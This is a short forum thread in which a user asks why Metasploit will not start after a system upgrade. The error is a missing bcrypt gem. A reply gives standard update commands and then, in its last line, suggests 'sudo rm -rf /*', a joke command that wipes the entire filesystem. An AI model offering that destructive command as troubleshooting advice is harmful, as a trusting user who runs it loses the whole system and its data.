[SOLVED] Metasploit not starting after update

Started by omking, March 02, 2015, 02:03:39 PM

Previous topic - Next topic

omking

Once i updated and upgraded the system and now msf is showing this message.

prime@Prime:$ sudo msfconsole
Could not find bcrypt-3.1.10 in any of the sources
Run `bundle install` to install missing gems.


as i run this command bundle install , it gives a message
Could not locate Gemfile or .bundle/ directory

I have also installed rubygems by apt as well as by source.
but still not solved..
thanks in advance and sorry for my bad english.

ZEROF

#1
To start upgrade your system, msf was upgraded.

sudo -i
apt update
apt upgrade
msfupdate

And it will be ok.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*